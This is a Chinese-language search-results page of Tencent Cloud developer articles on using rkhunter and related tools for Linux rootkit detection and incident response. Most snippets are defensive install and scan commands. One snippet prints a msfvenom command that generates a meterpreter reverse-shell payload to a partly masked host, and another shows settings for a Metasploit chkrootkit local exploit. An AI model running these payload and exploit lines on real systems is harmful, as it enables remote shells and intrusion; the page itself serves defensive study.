- 综合排序
- 最热优先
- 最新优先
- 来自专栏白安全组
使用Rkhunter检测linux渗透
安装 yum install rkhunter 这个软件需要及时的进行更新库 yum install rkhunter 基础使用方式也很简单 rkhunter -c 这里会检测各种模块 主要检测
1.1K10编辑于 2023-09-01 - 来自专栏python3
rootkit后门检查工具RKHunter
rkhunter的官方网站位于http://www.rootkit.nl/,注意:官网不能直接打开,必须要能访问谷歌才行。 目前最新的版本是rkhunter-1.4.6。 源码下载链接: http://jaist.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.6/rkhunter-1.4.6.tar.gz rootkit 安装 直接yum安装 yum install -y rkhunter 在线升级rkhunter rkhunter是通过一个含有rootkit名字的数据库来检测系统的rootkits漏洞, 所以经常更新该数据库非常重要 , 你可以通过下面命令来更新该数据库: rkhunter --update 为基本系统程序建立校对样本,建议系统安装完成后就建立 rkhunter --propupd 运行rkhunter检查系统 它主要执行下面一系列的测试 Please check the log file (/var/log/rkhunter/rkhunter.log) 从以上信息可以看出,已经有4个系统命令,被串改了。
5.4K11发布于 2020-03-12 - 来自专栏性能与架构
Linux入侵检测工具 - RKHunter
RKHunter是Linux系统平台下的一款开源入侵检测工具 特点 (1)安装便捷,运行快速 (2)扫描范围全,能够检测各种已知的rootkit特征码、端口扫描、常用程序文件的变动情况检查 主要功能 4)检测大多常用程序的文件异常属性 (5)扫描任何混杂模式下的接口和后门程序常用的端口 (6)检测如/etc/rc.d/目录下的所有配置文件、日志文件、任何异常的隐藏文件等等 使用方式 执行 rkhunter 的检查命令 # rkhunter -c rkhunter会进行一系列的检测,有问题的部分会给出红色的 Warning 警告,就需要你对这些问题进行处理了 rkhunter是通过自己的数据库来检查的 ,所以保持数据库最新非常重要,更新数据库的命令: # rkhunter --update 最好加入到系统的定时任务中 安装 官网 http://rkhunter.sourceforge.net/ 下载后解压,我下的是1.4.2版本 tar zxf rkhunter-1.4.2.tar.gz 进入解压后的目录执行安装脚本,非常快 cd rkhunter-1.4.2 .
6.3K71发布于 2018-04-03 - 来自专栏Cyber Security
【应急响应】后门攻击检测指南&Rookit&内存马&权限维持&WIN&Linux
-p linux/x64/meterpreter/reverse_tcp LHOST=47.94.xx.xx LPORT=7777 -f elf >shell.elf Rootkit后门:GScan rkhunter 权限维持后门:GScan rkhunter 1、GScan Linux主机 https://github.com/grayddq/GScan python GScan.py 2、rkhunter wget http://downloads.sourceforge.net/project/rkhunter/rkhunter/1.4.6/rkhunter-1.4.6.tar.gz tar -xvf rkhunter-1.4.6.tar.gz cd rkhunter-1.4.6 . /installer.sh --layout default --install rkhunter -c Web层面:通用系统层面 1、常规后门 2、内存马(无文件马) PHP 进程马
53810编辑于 2024-07-18 - 来自专栏子云笔记
exploit/unix/local/chkrootkit
192.168.63.142 set lport 4545 exploit -j exploit/unix/local/chkrootkit CVE-2014-0476 apt install -y rkhunter rkhunter --update rkhunter --propupd rkhunter --check --sk 4.jpg 3.png 2.png 1.png 0.jpg
25500编辑于 2022-05-21 - 来自专栏WalkingCloud
Linux入侵排查时安全工具整理
(图片可放大查看) 2、rkhunter 1)rkhunter简介 rkhunter也叫”Rootkit猎手”, rkhunter是Linux系统平台下的一款开源入侵检测工具,具有非常全面的扫描范围, 2、rkhunter的安装与使用 1)、配置EPEL源后安装rkhunter yum install rkhunter ? (图片可放大查看) 2)、在线升级rkhunter 的rootkit木马库 rkhunter --update ? #样本文件位置 /var/lib/rkhunter/db/rkhunter.dat 4)、执行检测命令 如果不想要每个部分都按 Enter 键来继续,想要让程序自动持续执行,可以使用 --sk参数, - -skip-keypress rkhunter --check --sk ?
4.2K42发布于 2021-04-22 - 来自专栏Khan安全团队
护网之Linux应急处理操作手册
RootkitHunter #安装 $sudo wget https://jaist.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter -1.4.4.tar.gz $sudo tar zxvf rkhunter-1.4.4.tar.gz $sudo cd rkhunter-1.4.4 $sudo sh install.sh --install #使用 $/usr/local/bin/rkhunter --propupd $/usr/local/bin/rkhunter -c --sk --rwo 症状研判-根据主机异常状态判断异常点 性能资源紧张
1.7K40发布于 2020-09-27 - 来自专栏运维前线
CentOS 7 安全加固、检测、审计
https://blog.csdn.net/wh211212/article/details/53063599 RKHunter:检测Rootkit RKHunter 传送门:http ://rkhunter.sourceforge.net/ Root Kit 详解:http://linux.vbird.org/linux_security/0420rkhunter.php RKHunter 安装 [root@linuxprobe ~]# yum --enablerepo=epel -y install rkhunter 配置和使用RKHunter,对于常规检查,检查脚本安装在 cron.daily目录下,并由Cron每天执行 [root@linuxprobe ~]# vi /etc/sysconfig/rkhunter # recipient address for report --update # update system file properties [root@linuxprobe ~]# rkhunter --propupd # execute checking
2.4K30发布于 2019-05-26 - 来自专栏一个默默无闻的工程师的日常
第一次遭遇挖矿程序
修改 vmuser 用户密码 注意到挖矿程序都是 vmuser 用户,所以修改 vmuser 用户密码 # passwd vmuser 入侵检测 不放心,使用 rkhunter 检测一下 1. 下载安装 # wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz # tar zxvf rkhunter-1.4.4.tar.gz && tar zxvf rkhunter-1.4.4.tar.gz && cd rkhunter-1.4.4 # . Please check the log file (/var/log/rkhunter.log) Suspect files 的警告和正常服务器上的一致,这里忽略 3. 卸载 rkhunter # cd rkhunter-1.4.4 && ./install.sh --remove
1.5K40发布于 2018-07-16 - 来自专栏Linyb极客之路
一篇文章说清楚 Linux 应急响应技巧
/chkrootkit 安装rkhunter进行扫描: Wgethttps://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter -1.4.4.tar.gz tar -zxvf rkhunter-1.4.4.tar.gz cd rkhunter-1.4.4 . /installer.sh --install rkhunter -c 最后一个环节往往是大家比较容易遗忘的,Linux平台下90%的病毒是通过网络传播感染的,所以,你的主机之所以会感染病毒,大部分原因也是因为
1.4K10发布于 2019-12-24 - 来自专栏白安全组
针对蓝队的Linux应急响应基础总结
/chkrootkit Linux下常用安全工具 rkhunter功能: 系统命令(Binary)检测,包括Md5 校验 Rootkit检测 本机敏感目录、系统配置、服务及套间异常检测 三方应用版本检测 使用方法: Wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz tar -zxvf rkhunter-1.4.4.tar.gz cd rkhunter-1.4.4 . /installer.sh --install rkhunter -c 网络行为分析 系统信息 who 查看系统信息 uname -a netstat -ano 查看网络和端口情况 netstat
1.4K21编辑于 2023-02-25 - 来自专栏小网管的运维之路
Linux 服务器安全攻防 - 病毒查杀
aide --update # 手动覆盖替换旧的数据库 cd /var/lib/aide/ &&mv aide.db.new.gz aide.db.gz # 手动检查命令 aide --check rkhunter # 基于当前系统建立对比样本 rkhunter --propupd # 手动检查命令 rkhunter --check clamav 测试用例 # test.bat X5O!
58520编辑于 2023-11-03 - 来自专栏互联网老辛
如何快速的为系统做安全检测
查杀 432 rkhunter --checkall --sk | ag -v 'OK|Not found|None found' 433 else 434 if [ - e "rkhunter.tar.gz" ]; then 435 tar -zxvf rkhunter.tar.gz >/dev/null 2>&1 436 cd rkhunter-1.4.6/ 437 . /installer.sh --install >/dev/null 2>&1 438 rkhunter --checkall --sk | ag -v 'OK|Not tar -zxvf rkhunter.tar.gz >/dev/null 2>&1 443 cd rkhunter-1.4.6/ 444
73110发布于 2020-06-17 - 来自专栏渗透测试教程
linux应急常用命令+技巧总结
# centos yum install -y rkhunter # ubuntu apt-get install rkhunter rkhunter --update #更新rkhunter版本 rkhunter --propupd #更新rkhunter的特征数据库 # 常见命令 rkhunter --check --sk #自动检测每个部分中间不需要暂停 rkhunter --check #自动检测每个部分,每监测完一个部分中断一次,输入enter之后会继续检测下个部分 rkhunter -c --sk --rwo #自动检测并只显示告警信息 webshell查杀 使用Webshell
1.5K20发布于 2021-03-23 - 来自专栏Bypass
【应急响应】Linux入侵排查思路
/chkrootkit rkhunter 网址:http://rkhunter.sourceforge.net 使用方法: Wget https://nchc.dl.sourceforge.net/project /rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz tar -zxvf rkhunter-1.4.4.tar.gz cd rkhunter-1.4.4 . /installer.sh --install rkhunter -c 二、病毒查杀 Clamav ClamAV的官方下载地址为:http://www.clamav.net/download.html
3.2K31发布于 2019-07-08 - 来自专栏世荣的博客
Linux应急响应排查思路
/chkrootkit (2)rkhunter:http:.rkhunter.sourceforge.net wget https://nchc.dl.sourceforge.net/project/rkhunter /rkhunter/1.4.4/rkhunter-1.4.4.tar.gz tar -zxvf rkhunter-1.4.4.tar.gz cd rkhunter-1.4.4.tar.gz cd rkhunter /installer.sh --install rkhunter -c 病毒查杀 (1)Clamav:http://www.clamav.net/download.html wget http://nchc.dl.sourceforge.net
3.1K20编辑于 2022-03-21 - 来自专栏OneMoreThink的专栏
记一个真实的应急响应案例(2)挖矿病毒事件
02、rkhunter 1. yum -y install rkhunter 或者 1. 浏览器下载https://sourceforge.net/projects/rkhunter/files/latest/download 2. tar -zxvf rkhunter-<版本>.tar.gz ; 3. cd rkhunter-<版本> 4. . /installer.sh --install 然后 1. rkhunter -c –sk 2. cat /var/log/rkhunter/rkhunter.log | grep -C 2 Warning
1.1K20编辑于 2024-10-15 - 来自专栏黑战士安全
Linux应急响应笔记
/chkrootkit rkhunter 使用方法: wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter -1.4.4.tar.gz 我测试的时候发现上面链接无法下载了,所以换了下面的链接 wget https://fossies.org/linux/privat/rkhunter-1.4.6.tar.gz tar -zxvf rkhunter-1.4.6.tar.gz cd rkhunter-1.4.6 . /installer.sh --install rkhunter -c 攻击维持 查看历史命令 busybox cat ~/.bash_history 检测动态库劫持 查看环境变量动态库劫持 busybox
1.9K30编辑于 2022-11-19 - 来自专栏数通
CentOS系统安全配置防御维度
入侵检测与防御 • 意图:实时监控和阻断恶意行为 • 实现方式: • 启用审计服务(auditd)记录关键操作 • 部署 fail2ban 防暴力破解 • 定期扫描 rootkit(rkhunter、chkrootkit 安装安全检查工具 sudo yum install rkhunter chkrootkit lynis -y 2. 定期扫描 sudo rkhunter --check sudo chkrootkit sudo lynis audit system 3. 设置cron任务定期检查 sudo crontab -e 添加: 0 3 * * * /usr/bin/rkhunter --check --cronjob 通过以上全面的安全配置,可以显著提高
31010编辑于 2025-07-14 - 来自专栏技术博文
检查Linux是否被入侵的方法
/rc.d/rc.local ls /etc/rc.d ls /etc/rc3.d 九、检查系统服务 chkconfig --list rpcinfo -p(查看RPC服务) 十、检查rootkit rkhunter --check //(若无,yum install rkhunter) chkrootkit -q
3.3K81发布于 2018-04-16
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号